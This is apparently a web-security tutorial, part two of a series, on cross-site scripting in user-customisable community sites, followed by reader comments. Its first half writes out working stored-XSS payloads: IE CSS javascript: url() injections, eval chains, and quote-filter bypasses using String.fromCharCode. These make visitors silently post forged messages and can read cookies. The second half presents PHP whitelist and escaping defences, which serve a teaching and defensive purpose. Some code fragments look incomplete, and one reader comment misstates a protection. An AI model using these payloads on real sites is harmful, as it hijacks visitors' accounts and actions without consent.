Community Creators, Secure Your Code! Part II

In part one of this two-part series, we discussed the threat of cross-site scripting in general terms and introduced a number of important security concepts. In part two, we’ll take a more in-depth, hands-on approach: How does an attacker actually exploit the weaknesses found? How can you protect yourself? For reasons of length, we’ll limit our discussion to two specific, representative examples.

Real-world examples

Our examples are divided into three parts:

  1. The code—the XMLHttpRequest used to send data to or fetch data from the server,
  2. The scenario—injecting a guest book message, and
  3. The security test—our attempt to bypass various security measures.

The code

Let’s start with the XMLHttpRequest code. This is basically the same in all our examples (this one is for POST, and is based on code by Drew McLellan):

function xmlhttp(){
  // Branch for native XMLHttpRequest object
  if( window.XMLHttpRequest ){
    xmlhttp = new XMLHttpRequest();
  // Branch for IE/Windows ActiveX version
  } else if( window.ActiveXObject ){
    try{
      xmlhttp = new ActiveXObject( 'Msxml2.XMLHTTP' );
    }catch( e ){
      try{
        xmlhttp = new ActiveXObject( 'Microsoft.XMLHTTP' );
      }catch( e ){}
    }
  }

  /* The send variable, syntax:
     variable1=content1&variable2=content2
     The content should be URL encoded
     if it contains special characters. */
  send = 'variable1=content1&variable2=content2';

  // URL to send it to
  url = '';

  // Function which the data returned is sent to
  xmlhttp.onreadystatechange = nullfunction;

  // POST
  xmlhttp.open( 'POST', url, true );

  // It's a form, use urlencode
  xmlhttp.setRequestHeader( 'Content-type',
    'application/x-www-form-urlencoded' );

  // Calculate length
  // (current browsers set Content-length and Connection
  // themselves and ignore these two calls)
  xmlhttp.setRequestHeader( 'Content-length',
    send.length );

  xmlhttp.setRequestHeader( 'Connection', 'close' );

  // Send
  xmlhttp.send( send );
}

function nullfunction(){
  /* Un-comment to debug (will show any
     status 200 (OK) response in an alert box) */
  // if( xmlhttp.readyState == 4 &&
  //     xmlhttp.status == 200 ){
  //   alert( xmlhttp.responseText );
  // }
}

Often, we aren’t interested in the window.XMLHttpRequest branch, since many of these attacks rely on quirks in IE’s CSS handling. This code is pretty straightforward, and only a few parts are of interest to us.

The send variable
This variable holds our form data. The content should be URL-encoded if it contains any special characters (spaces, etc.).
The url variable
This will be changed to the location of the server-side script (PHP, ASP, etc.) we wish to get data from or send data to.
xmlhttp.onreadystatechange
This is set to the function we wish to invoke whenever the state of the request changes, for example when the response arrives. In our examples we use nullfunction since we aren’t interested in getting any data in return. In more advanced examples we would then manipulate the data returned and break out the parts we needed. This could be used to fetch personal information (name, address, password) and send it to your server using one xmlhttp() to fetch the information and another to send it.
xmlhttp.open( method, url, asynchronous )
Method is set to either GET or POST depending on whether we are getting or sending; url is set to our URL (see the url variable above). Asynchronous is set to true or false. If set to false, the browser will lock up until the response is received. We will set this to true, since we don’t want to risk alarming the user.
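
As a minimal sketch of the URL encoding mentioned for the send variable, the helper below builds a form body from name/value pairs. The name encodeForm and the sample field values are hypothetical and not part of the original code; the sketch relies only on the standard encodeURIComponent and swaps %20 for + to match the form-style encoding used in this article.

```javascript
// Hypothetical helper (not from the original code): builds an
// application/x-www-form-urlencoded body from name/value pairs.
function encodeForm(fields) {
  return Object.keys(fields)
    .map(function (name) {
      return encodeURIComponent(name) + '=' + encodeURIComponent(fields[name]);
    })
    .join('&')
    .replace(/%20/g, '+'); // forms encode spaces as "+"
}

// Spaces and ampersands inside values are encoded so they cannot
// be confused with the separators between fields.
var send = encodeForm({ variable1: 'content 1', variable2: 'a&b' });
```

Encoding each value separately is the point: an unencoded & inside a value would otherwise be read by the server as the start of a new variable.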

The scenario

We’ll go through the following examples from an attacker’s point-of-view. The community we wish to manipulate is set up in a standard way: users can control the presentation of their user pages, and they can add friends and send messages, guest-book style. In our example, we will try to inject code into the presentation of our personalized user page that automatically sends a message to our guest book whenever another user visits our page. (This is essentially how the MySpace XSS attack worked.)

First, we look up the information we need: URLs, form information, etc. You can do this using Firefox’s built-in Form information, or you can just look in the source code.

We log in and navigate to the “add friends” page. We right-click and choose “View page info.” In the “Forms” tab of the recently opened dialog, we find the form information:

Form name: Form1
Method: POST
Form action: addmessage.php?id=3516

Form Form1:
Field name: private (Value: True)
Field name: message (Value: JS injected)
Field name: send    (Value: send)

Or we can get the same information by simply looking at the source code:

<form name="Form1" method="post" action="addmessage.php?id=3516">
<input name="private" type="text" value="true">
<input name="message" type="text" value="JS injected">
<input name="send" type="submit" value="send">
</form>

This is all we need, but what does it tell us? In order to inject the message, we will need to send the variables private (true or false, depending on whether the message is private or not), message (a string, “JS injected” in our case) and send (value “send”) to the URL addmessage.php?id=3516.

We will need to edit the code to fit our needs:

function nullfunction(){
  if( xmlhttp.readyState == 4 &&
      xmlhttp.status == 200 ){
    alert( xmlhttp.responseText );
  }
}
// Branch for native XMLHttpRequest object
if( window.XMLHttpRequest ){
  xmlhttp = new XMLHttpRequest();
// Branch for IE/Windows ActiveX version
}else if( window.ActiveXObject ){
  try{
    xmlhttp = new ActiveXObject( 'Msxml2.XMLHTTP' );
  }catch( e ){
    try{
      xmlhttp = new ActiveXObject( 'Microsoft.XMLHTTP' );
    }catch( e ){}
  }
}
send = 'private=true&message=JS+injected&send=send';
xmlhttp.onreadystatechange = nullfunction;
// Use our URL
xmlhttp.open( 'POST', 'addmessage.php?id=3516', true );
// It's a form, use urlencode
xmlhttp.setRequestHeader( 'Content-type',
  'application/x-www-form-urlencoded' );
xmlhttp.setRequestHeader( 'Content-length', send.length );
xmlhttp.setRequestHeader( 'Connection', 'close' );
// Send
xmlhttp.send( send );

Please note that since we want our code to execute on page load, we’ve extracted the XMLHttpRequest code from its function, leaving nullfunction as the only function in use. For debugging purposes, we’ve added an alert to our nullfunction so that whatever addmessage.php?id=3516 returns (the HTML code) will be shown to us in an alert box.

Before we start, I’d like to give some tips on testing the code:

  • Use alert boxes to check where the code goes wrong.
  • Point the XMLHttpRequest at a PHP (or ASP, etc.) file that simply echoes out the POST. In PHP, this would look like: <?php print_r( $_POST ); ?>
  • Use alert() to see the data being returned.

Injecting JavaScript

Here comes the tricky part: bypassing the security measures taken by the community creators. To do this, we use eval(), which will let us execute any JavaScript string. To prepare the code, we strip the comments and line breaks so it all ends up on one line:

eval('function nullfunction(){if( xmlhttp.readyState == 4 && xmlhttp.status == 200 ){alert(xmlhttp.responseText);}}if( window.XMLHttpRequest ){xmlhttp = new XMLHttpRequest();}else if( window.ActiveXObject ){ try{xmlhttp = new ActiveXObject( \'Msxml2.XMLHTTP\' );}catch( e ){try{xmlhttp = new ActiveXObject( \'Microsoft.XMLHTTP\' );}catch( e ){} }}send = \'private=true&message=JS+injected&send=send\'; xmlhttp.onreadystatechange = nullfunction; xmlhttp.open( \'POST\', \'js3.php\', true );xmlhttp.setRequestHeader( \'Content-type\', \'application/x-www-form-urlencoded\');xmlhttp.setRequestHeader( \'Content-length\', send.length );xmlhttp.setRequestHeader( \'Connection\', \'close\' );xmlhttp.send( send );');

Now that we know what we wish to inject and have it neatly formatted in one line, we can start trying to bypass the filters.

Example #1: Injecting JavaScript with a locked style tag, single quotes allowed

As stated in part one of this series, IE will treat the following statement as JavaScript (line wraps marked » —Ed.):

style="background:url(javascript: »

And also:

<div style="background:url(javascript:eval(alert(document.cookie)))">

However, since we have a mix of JavaScript, HTML, single quotes, and double quotes, escaping characters for eval can be tricky. Here are two guidelines:

  • In string assignments, single quotes must be escaped with two backslashes and the terminating semicolon with one (e.g.: myString = \\'value\\'\;).
  • In function calls, single quotes must be escaped with one backslash (e.g.: test(\'test\')\;), unless you are creating an object, in which case they must be escaped with two (e.g.: new ActiveXObject(\\'Msxml2.XMLHTTP\\')\;).

Following these guidelines gives us our (fully functional) end result:

<div style="background:url(javascript:eval('function nullfunction(){if( xmlhttp.readyState == 4 && xmlhttp.status == 200 ){alert( xmlhttp.responseText );}}if( window.XMLHttpRequest ){xmlhttp = new XMLHttpRequest();}else if( window.ActiveXObject ){try{xmlhttp = new ActiveXObject(\\'Msxml2.XMLHTTP\\');}catch( e ){try{xmlhttp = new ActiveXObject(\\'Microsoft.XMLHTTP\\');}catch( e ){}    }}send=\\'private=true&message=JS+injected&send=send\\'\;  xmlhttp.onreadystatechange=nullfunction\; xmlhttp.open( \'POST\', \'addmessage.php?id=3516\', true )\;xmlhttp.setRequestHeader( \'Content-type\', \'application/x-www-form-urlencoded\' )\;xmlhttp.setRequestHeader( \'Content-length\', send.length )\;xmlhttp.setRequestHeader( \'Connection\', \'close\' )\;xmlhttp.send( send )\;'))">

Or, to break it down a little more readably:

<div style="background:url(javascript:eval('
function nullfunction(){
  if( xmlhttp.readyState == 4 &&
      xmlhttp.status == 200 ){
    alert( xmlhttp.responseText );
  }
}
if( window.XMLHttpRequest ){
  xmlhttp = new XMLHttpRequest();
}else if( window.ActiveXObject ){
  try{
    xmlhttp = new ActiveXObject( \\'Msxml2.XMLHTTP\\' );
  }catch( e ){
    try{
      xmlhttp = new ActiveXObject( \\'Microsoft.XMLHTTP\\' );
    }catch( e ){}
  }
}

send= \\'private=true&message=JS+injected&send=send\\'\;
xmlhttp.onreadystatechange=nullfunction\;
xmlhttp.open( \'POST\', \'addmessage.php?id=3516\', true )\;
xmlhttp.setRequestHeader( \'Content-type\',
\'application/x-www-form-urlencoded\' )\;
xmlhttp.setRequestHeader( \'Content-length\', send.length )\;
xmlhttp.setRequestHeader( \'Connection\', \'close\' )\;
xmlhttp.send( send )\;
'))">

And that’s it; we’ve successfully injected our JavaScript code. Any visitor to our (the attacker’s) user page will automatically send us a guestbook message stating “JS Injected.”

Example #2: Injecting JavaScript with an unlocked style tag, single quotes forbidden

First off, what is the difference between a “locked” and “unlocked” style tag?

If the community has an unlocked style tag, this code is valid:

<div ex1="" ex2="" ex3="" style="">

A community that has locked the tag, on the other hand, would remove ex1/ex2/ex3, since they are not on its white list. One could get around this, if the id attribute is allowed, by simply creating lots of divs (<div id="ex1">code</div>) and using document.all.ex1.innerHTML. You would, however, have to “conceal” the code, since it would show up as HTML, which could make the user suspicious.
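
From the defender’s side, “locking” a tag can be sketched roughly as follows. This is a simplified illustration, not a production filter: the names ALLOWED_ATTRIBUTES and lockTag are hypothetical, the regular expression only understands double-quoted attributes, and a real site would more likely use a proper HTML parser.

```javascript
// Hypothetical sketch: keep only whitelisted attributes on an opening tag.
var ALLOWED_ATTRIBUTES = ['style'];

function lockTag(tag) {
  // Matches name="value" pairs preceded by whitespace.
  return tag.replace(/\s+([a-zA-Z0-9_-]+)="([^"]*)"/g, function (match, name) {
    // Keep the attribute untouched if it is on the white list, else drop it.
    return ALLOWED_ATTRIBUTES.indexOf(name.toLowerCase()) !== -1 ? match : '';
  });
}

var locked = lockTag('<div ex1="a" ex2="b" ex3="c" style="color: red;">');
// locked is '<div style="color: red;">'
```

Note that the style attribute itself survives this step unchanged, so its contents still have to be checked separately.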

But let’s go back to the example; the community is stripping the single quote character. This makes it a lot trickier, since the code used in example #1 won’t work.

JavaScript without single and double quotes (since double quotes would collide with our style attribute) is hard, but can be done. The idea is to use String.fromCharCode() and the ability to read a custom attribute of a div (document.all.divid.attribute).

Using String.fromCharCode(39) will actually give us a single quote, but the following code is invalid:

<div style="background:url(javascript:eval(

This fails because we can’t mix string calls and functions as we do above.

Let’s start out slow, to get a feel for fromCharCode() and its use. The following code will actually produce eval(alert('test');):

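<div ex0="alert(" ex1="test" ex2=");" id="mycode" style="background:url(javascript:eval(document.all.mycode.ex0+String.fromCharCode(39)+document.all.mycode.ex1+String.fromCharCode(39)+document.all.mycode.ex2))">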

This might look like Greek, but let’s break it down:

  1. document.all.mycode.ex0 will add the string in ex0, in this case the first side of the alert() method call, “alert(”.
  2. String.fromCharCode(39) will add the first single quote.
  3. document.all.mycode.ex1 will add the string in ex1, in this case the content of our alert(), “test.”
  4. String.fromCharCode(39) will add the second single quote.
  5. document.all.mycode.ex2 will add the string in ex2, in this case closing our alert() call, “);”.
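
The five steps above can be traced in plain JavaScript. In this sketch the three attribute values are ordinary variables standing in for document.all.mycode.ex0 through ex2 (an assumption made so the snippet runs outside a browser), and the resulting string is only built, never passed to eval().

```javascript
// Stand-ins for the three custom attribute values of the div.
var ex0 = 'alert(';
var ex1 = 'test';
var ex2 = ');';

// 39 is the character code of the single quote.
var quote = String.fromCharCode(39);

// Concatenate the pieces in the same order as the five steps.
var code = ex0 + quote + ex1 + quote + ex2;
```

The single quotes never appear in the markup itself, which is why a filter that only strips the quote character from user input does not stop this.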

Adding these up we get:

  1. alert(
  2. '
  3. test
  4. '
  5. );

Or, in one line:

alert('test');

Now that we understand how it works, we just have to remove the single quotes from our previous code, create the element’s custom attributes and then rewrite our eval() to insert the single quotes where we need them:

ex0="function nullfunction(){ if( 
xmlhttp.readyState == 4 && xmlhttp.status == 200 ){
alert( xmlhttp.responseText );}}if( window.XMLHttpRequest ){
xmlhttp = new XMLHttpRequest();
}else if( window.ActiveXObject ){
try{ xmlhttp = new ActiveXObject(" 
ex2=");}catch( e ){try{xmlhttp = new ActiveXObject(" 
ex4=");}catch( e ){}}}send =" 
ex6=";xmlhttp.onreadystatechange = nullfunction;xmlhttp.open(" 
ex8=", " 
ex10=", true);xmlhttp.setRequestHeader(" 
ex12=", " 
ex14="); xmlhttp.setRequestHeader(" 
ex16=", send.length ); xmlhttp.setRequestHeader(" 
ex18=", " 
ex20="); xmlhttp.send( send );"

This is our fully functional example #2. It can be hell to debug, though, so make sure you format the code correctly from the start. If IE complains of weird errors (or doesn’t complain, but doesn’t execute either), try putting the eval() string in an alert box and reading the code manually. Look for 'undefined' or single quotes out of place.

Protecting yourself

As described in part one of this series, you can sanitize your community site in several ways, depending on your needs and the level of your paranoia. (Please note that I will escape the following code for JavaScript only. If you intend to insert it in a database, you might need to escape it properly even after this code. PHP has functions for this, such as mysql_real_escape_string().)

I am not presenting these code snippets as a complete solution; think of them as suggestions to get you started. While implementing strong security measures from the start is great, you’ll also need to keep yourself up to date, since new exploits are found in browsers every day. Since I am a PHP developer, my code will be in PHP. Feel free to contribute code in the language of your choice in the article’s discussion forums.

In our examples, we will use the variable $string for simplicity. When JavaScript is found, we will call die("Possible JavaScript injection found"). This is not a recommended solution for actual use; a more suitable approach would be to reject the code and show it to the user again, warning them against the use of JavaScript. You could also log the attempts.

A classical solution: search and block

One way of protecting yourself is to search for patterns or words and simply reject the input if there is a match. This is used by many to block out <script> tags.

if( preg_match( '/<script>/', $string ) ){
  die( 'Possible JavaScript injection found' );
}

Or even simpler:

if( stripos( $string, '<script>' ) !== false ){
  die( 'Possible JavaScript injection found' );
}

This might be one of the more attractive approaches due to its simplicity, but I would not recommend relying on it alone, since you would need to find every possible way of injecting JavaScript (<script>, style tags, onClick, onLoad, javascript:eval() in URLs, etc.).
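
To make the weakness concrete, here is a small sketch of the same search-and-block idea written in JavaScript. The function name looksLikeScript and the sample inputs are made up for illustration; the check mirrors the case-insensitive search above.

```javascript
// Naive check, mirroring the search-and-block approach above.
function looksLikeScript(input) {
  return input.toLowerCase().indexOf('<script>') !== -1;
}

var samples = [
  '<script>alert(1)</script>',                         // caught
  '<script type="text/javascript">alert(1)</script>',  // missed: attribute in the tag
  '<div style="background:url(javascript:alert(1))">', // missed: style attribute
  '<b onclick="alert(1)">text</b>'                     // missed: event handler
];

var results = samples.map(looksLikeScript);
// results is [true, false, false, false]
```

Only the first sample is rejected; each of the others would need its own pattern, and the list of patterns never really ends.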

A new approach

I’m paranoid; I like to try to be fully protected. In PHP, htmlentities() does this. It converts “all applicable characters to HTML entities.”

Here’s an example:

$str = "A 'quote' is <b>bold</b>";

# Outputs: A 'quote' is &lt;b&gt;bold&lt;/b&gt;
echo htmlentities($str);

# Outputs: A &#039;quote&#039; is &lt;b&gt;bold&lt;/b&gt;
echo htmlentities($str, ENT_QUOTES);

There are several reasons I like to start with htmlentities(). I like to have solid ground to stand on. If you use a blacklist to remove JavaScript and miss one attack vector, your site is vulnerable. If you use htmlentities() and forget to re-enable one tag, you are not vulnerable; the worst-case scenario is that <b> doesn’t convert to bold.
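
For readers who do their escaping in JavaScript, a rough counterpart might look like the sketch below. The function name escapeHtml is hypothetical, and the sketch covers only the five characters that matter for markup (closer to PHP’s htmlspecialchars() with ENT_QUOTES than to the full htmlentities() conversion).

```javascript
// Hypothetical helper: escapes the characters that can open tags,
// entities, or attribute values.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')   // must run first so later entities are not re-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

var escaped = escapeHtml("A 'quote' is <b>bold</b>");
```

After this step nothing in the input can start a tag or close an attribute, which is the “solid ground” the white-list steps below build on.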

From here we can go two ways; we can either let our users use custom tags such as [color] or we can let them use regular HTML tags. I will explore both of these options.

Custom tags

This is the easiest way. We simply look for a tag and validate it. In our example we will take [color=#hex] text [/color] and convert it to <span style="color: #hex;"> text </span>. We want to allow the use of both #hex and names and we’ll use regular expressions to check it.

I use a program called The Regex Coach to try out regular expressions; it simplifies the process. I will be using preg_replace. (I started out with regular expressions in Perl for one of my projects and have stuck with them since. It works well, and preg_replace is often faster than ereg_replace.)

preg_replace() takes three arguments (pattern, replacement, and subject). Pattern is a Perl-style regular expression, replacement is the string to replace with, and subject is our string. If you don’t have basic knowledge of regular expressions, do a search on Google.

We will start by making a regular expression. These are the requirements to match:

  • If it is a hex code (starts with #) it should be 3 or 6 characters long and contain A-F and 0-9.
  • If it is a name, we have two alternatives: either we allow A-Z (3-7 characters long) or we specifically allow the sixteen colors in the W3C CSS standard.

We’ll use the first alternative for now. Let’s walk through the first regex together to refresh our memories:

/\[color=(#[a-fA-F0-9]{3,6}|[a-zA-Z]{3,7})\](.+)\[\/color\]/

  • Brackets and slashes need to be escaped by a backslash.
  • The variables we need are placed between parentheses as capture groups for later use (they get translated into $n where n is the number of the parentheses ($1, $2, $3)).

This gives us two capture groups to focus on:

1. (#[a-fA-F0-9]{3,6}|[a-zA-Z]{3,7})

This is divided into two parts (the string can match either one) by the | delimiter:

#[a-fA-F0-9]{3,6} tells us that it must start with # and continue with three to six characters (a-f and/or 0-9).

[a-zA-Z]{3,7} tells us that it must contain three to seven a-z characters. This could also be (aqua|black|blue|fuchsia|gray|green|lime|maroon|navy|olive|purple|red|silver|teal|white|yellow), since those are the sixteen allowed colors.

2. (.+) simply tells us it can match any character one or more times.

This gives us (line wraps marked » —Ed.):

$string = '[color=#000000] testing [/color]';
$string = htmlentities($string);
$pattern = "/\[color=([#]?[a-fA-F0-9]{3,6}| »
[a-zA-Z]{3,7})\](.+)\[\/color\]/";
$replacement = "<span style=\"color: $1\">$2</span>";
$string = preg_replace( $pattern, $replacement, $string );
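
The same escape-then-convert order can be sketched in JavaScript. The names escapeHtml, COLOR_TAG, and convertColorTags are hypothetical, and the sketch differs from the PHP in one respect: it uses a lazy (.+?) so that two [color] tags on one line are converted separately.

```javascript
// Hypothetical helper: escape markup characters before any conversion.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Group 1: hex code or short color name. Group 2: the enclosed text.
var COLOR_TAG = /\[color=(#?[a-fA-F0-9]{3,6}|[a-zA-Z]{3,7})\](.+?)\[\/color\]/g;

function convertColorTags(input) {
  // Escape first, so the only markup in the result is what we generate.
  return escapeHtml(input).replace(COLOR_TAG, '<span style="color: $1">$2</span>');
}

var ok = convertColorTags('[color=#000000] testing [/color]');
// ok is '<span style="color: #000000"> testing </span>'

var rejected = convertColorTags('[color=expression(alert(1))]x[/color]');
// rejected is left as plain text: '[color=expression(alert(1))]x[/color]'
```

A color value that does not fit the pattern is simply never converted, so it reaches the page as harmless text rather than as a style attribute.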

White lists

White lists are a bit trickier, and I am sure there are several different solutions for this. In mine I will use arrays containing the allowed variables. If you are looking for more examples try the comment section of preg_replace. As you probably know, there’s more than one way to do things. There may indeed be a better way to write this, but the code below should at least get you started.

In this example we will define which HTML tags and CSS styles are allowed. In my example I will let my users use the following HTML tags: strong, span, and div. The following styles will be allowed: font-weight, font-family, font, background, background-color, and color. (line wraps marked » —Ed.)

// Our string to process
$string = '<strong>Line1</strong><br /> »
<div style="color: grey;">Grey text</div> »
<span style="color:#999;font-family:verdena;"> »
Span Example</span>';

# Since I am paranoid I will use htmlentities() from the start
$string = htmlentities($string);

$allow = array('strong', 'div', 'span', 'br \/');

/* On my example site we will allow certain style properties
 These are divided into two parts:
   1. A-Z 0-9 input
   2. Colors
 This is simply to show two different RegExs. */

$cssaz    = array( 'font-weight', 'font-family', 'font' );
$csscolor = array( 'background', 'background-color', 'color' );

foreach( $allow as $tag ){
  /* The regex is quite simple once you get used to
     the htmlentitied data
     Basically, it checks for <tag (style="")> */
  $string = preg_replace_callback( »
  '/\&lt\;('.$tag.')([\s]+style=\&quot\; »
  ([a-z0-9\,\;\:\-\s\#]+)\&quot\;[\s]*)?\&gt\;/i', »
  'cleanit', $string );

  # Restore the matching closing tag
  $string = preg_replace( '/\&lt\;\/('.$tag.')\&gt\;/i',
                   "</$1>", $string);
}

# echo the processed string
echo $string;

/* Our callback function that will check if our HTML tag 
 has style tags attached to it. If it has we must make 
 sure it contains only the allowed styles. */

function cleanit( $array ){
  global $cssaz, $csscolor;
  /* If the array contains more than 2 indexes
     the style parentheses matched. */
  if( count( $array ) > 2 ){
    # $array[3] is the content of the style tag.

    /* Below is a basic check for javascript (or actually,  
       just the 'java' part). This can be used if you want 
       to log attempts etc. The tag is returned without
       its style. */
    if( stripos($array[3], 'java') !== false )
      return "<$array[1]>";

    /* As I've already pointed out, we are working with white 
       lists instead of black lists. Instead of checking for
       disallowed styles, you check for allowed. */

    # Trim whitespace
    $array[3] = str_replace(' ', '', $array[3]);

    # Do we have an ending semicolon? If not, add it.
    if( substr( $array[3], -1 ) !== ";" )
      $array[3] .= ";";

    /* We use preg_match_all to look for matches and return  
       them to the array $matches */
    preg_match_all( '/('.implode('|', $cssaz).'): »
([a-z0-9\s\,\.]+);/', $array[3], $matchesaz );

    # Match colors too...
    preg_match_all( '/('.implode('|', $csscolor).'):([#]? »
[a-fA-F0-9]{3,6}|[a-zA-Z]{3,7});/',
      $array[3], $matchescolor );

    /* When preg_match_all returns an array 
       0 is the matches string, 1 is our first 
       parenthesis and 2 is our second.
       We want the entire match */

    # Return the htmlcode
    return "<$array[1] style=\"".implode( " ", $matchesaz[0] ).
      "  ".implode( " ", $matchescolor[0] )."\">";
  }

  # No style attribute: return the bare tag
  return "<$array[1]>";
}
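
The style check at the heart of the callback can also be sketched on its own. The JavaScript below is an illustrative variant, not a port of the PHP: the names ALLOWED_TEXT, ALLOWED_COLOR, and filterStyle are hypothetical, and it splits the style string into declarations instead of using preg_match_all, keeping only declarations whose property and value are both on the white list.

```javascript
// Properties that may carry plain text values, and properties
// that may carry a color value.
var ALLOWED_TEXT  = ['font-weight', 'font-family', 'font'];
var ALLOWED_COLOR = ['background', 'background-color', 'color'];

function filterStyle(style) {
  var kept = [];
  style.split(';').forEach(function (declaration) {
    var parts = declaration.split(':');
    if (parts.length !== 2) { return; } // drops empty or malformed pieces
    var property = parts[0].trim().toLowerCase();
    var value = parts[1].trim();
    var isText = ALLOWED_TEXT.indexOf(property) !== -1 &&
      /^[a-z0-9\s,.]+$/i.test(value);
    var isColor = ALLOWED_COLOR.indexOf(property) !== -1 &&
      /^(#?[a-f0-9]{3,6}|[a-z]{3,7})$/i.test(value);
    if (isText || isColor) { kept.push(property + ':' + value + ';'); }
  });
  return kept.join(' ');
}

var clean = filterStyle(
  'color:#999; font-family:verdena; background:url(javascript:alert(1))'
);
// clean is 'color:#999; font-family:verdena;'
```

Because only known-good declarations are copied into the result, a new or unusual injection trick in a style value is dropped by default instead of having to be recognized.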


Part one of this series focused on theory, while part two provided a more hands-on look at methods of attacking customizable sites and at protective measures. By now, you should have gotten your hands dirty with some JavaScript and gained more insight into how XSS attacks work and how you can protect yourself from them.

About the Author

Niklas Bivald

Niklas Bivald (LinkedIn, GitHub) is a tech guy at heart. He loves creative use of data. His passion is the belief that tech and creativity are like milk and cookies, not opposites. He's a long-time lecturer with a background at tech companies such as Spotify and various agencies.

12 Reader Comments

  1. When you use custom tags you tend to store the result in the database as HTML, so the conversion doesn’t need to take place every time the data is displayed.

    However, this means you need a function to turn the HTML back into custom tags if the user wishes to edit their data.

    When a user submits their data, I run the HTML-to-custom function, then htmlentities(), then the custom-to-HTML.

    This means that the user can use simple HTML in their post and custom tags. The safe HTML will be converted to custom tags before the rest of the HTML is escaped.


  2. An alternative to storing the content as HTML in the database would be to store the content as your custom code in the database and to generate a static page from it that is served until the content is published again. Yes, this would double the data storage from generating pages dynamically, but it would have the same total storage as a page being cached on your server (which you are probably doing anyway on any site that is either large or has high traffic). It also builds in a natural backup to your data – which is a good thing.

  3. A thought: if you removed all forms of open-parenthesis from any place where code could be executed, would this be enough to nix most Javascript?

    _'(‘ ‘%28’ ‘&#040;’ ‘&#x28;’ etc._

  4. If your going to chop out all the single and double quotes howz about also looking for ‘fromCharCode’ and killing that as well? Might even put ‘XMLHttpRequest’ and ‘ActiveXObject’ on the black list. You could actually just put all the JavaScript keywords on the black list which are known and limited. Black lists are only a bad idea when the potential threat is unlimited. Given that Javascript is a well know and finite language…?

    Oh Christopher, I think if you took away the parenthesis you would stop all the url() stuff in CSS which might be desirable. Of course killing all the quotes stops ‘content:’ in CSS as well (but who cares IE doesn’t support it).


  5. Well, blacklisting is ok for the known problems, but if you have thousands of user comments and you don’t know yet what bugs the next IE will contain, then a generic approach would be better. I like the idea of just not allowing single and double quotes, since this stops most intrusion approaches and is easy to implement. I just have to find some time…

  6. I have no doubt gained more knowledge into how XSS attacks work and how to protect myself from them in the furute from your series, when I first came accross the article I thought you were referring to patenting your code but was pleased to find your article on the above topics.But I to agree with Andreas blacklisting would be great problem solver as well, and getting a master list is pretty easy my favorite is Jay Allens

  7. I like the simple approaches best, can’t imagine any site owner needing to worry about going deeper. In the past I’ve implemented a more robust solution but it required a recursive regex function which wasn’t too friendly on CPU cycles. I don’t plan on using it again.

  8. If you are target of attacks, I would prefer to secure the community by whitelisting. Especially when you think about future bugs in browsers. When the rules are built the whitelist is easy to administrate.

  9. I think there is nothing more efficient than encoding your pages using one of any encoding software available, such as ionCube PHP encoder. That’s just one of many. I can’t imagine more secure, protective way than this.

  10. Im with Thorsten. I think whitelisting is the best and safest way ever. Nobody needs so much custom tags and if you only allow a few tags, its no problem to handle it.
